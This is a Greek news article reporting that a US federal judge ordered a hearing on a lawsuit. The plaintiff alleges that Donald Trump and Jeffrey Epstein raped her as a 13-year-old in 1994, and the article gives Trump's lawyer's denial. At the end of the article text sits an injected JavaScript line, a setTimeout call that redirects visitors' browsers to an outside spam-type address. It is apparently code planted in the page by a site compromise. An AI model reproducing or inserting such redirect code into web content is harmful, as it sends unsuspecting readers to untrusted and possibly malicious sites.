Αντιμέτωπος με κατηγορία βιασμού ο Τραμπ!

0
9

 

Ομοσπονδιακή δικαστής διέταξε τη διενέργεια ακρόασης, για την αγωγή που έχει καταθέσει γυναίκα, η οποία ισχυρίζεται ότι ο υποψήφιος των Ρεπουμπλικανών για την προεδρία των ΗΠΑ Ντόναλντ Τραμπ, τη βίασε όταν εκείνη ήταν 13 ετών, το 1994.

Στη μήνυση, σύμφωνα με την Independent, μία μάρτυρας -που αναφέρεται μόνο με το ψευδώνυμο Τίφανι Ντόε- καταγγέλλει ότι είδε τον κ. Τραμπ και τον δισεκατομμυριούχο Τζέφρι Επστάιν– ο οποίος έχει καταδικαστεί γιατί εξέδιδε ανήλικες- να βιάζουν επανειλημμένα την ενάγουσα, η οποία επίσης δεν κατονομάζεται.

Ο Τραμπ έχει διαψεύσει επανειλημμένα αυτές τις κατηγορίες. «Οπως έχω ξαναπεί, οι ισχυρισμοί είναι κατηγορηματικά αναληθείς και προφανώς πρόκειται για ένα κόλπο δημοσιότητας, με στόχο να πληγεί η φήμη του πελάτη μου», δήλωσε ο δικηγόρος του μεγιστάνα, Αλαν Γκαρτέν, προειδοποιώντας ότι αν τελικά κληθούν σε δίκη, θα επιδιώξουν να επιβληθούν κυρώσεις για αυτή την «επιπόλαιη μήνυση».

Η δικαστής διέταξε ακροαματική διαδικασία στις 16 Δεκεμβρίου, στη Ν. Υόρκη ζητώντας από τις δύο πλευρές να παρουσιάσουν πληροφορίες, προκειμένου να βοηθήσουν το δικαστήριο να προχωρήσει την υπόθεση σε συμβιβασμό ή σε δίκη.

Ωστόσο, και η πρώην σύζυγος του Τραμπ, Ιβάνα, τον είχε κατηγορήσει για βιασμό, κατά τη διαδικασία του διαζυγίου τους, το 1991. Αργότερα όμως διευκρίνισε ότι δεν το εννοούσε κυριολεκτικά ή με την εγκληματική έννοια. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here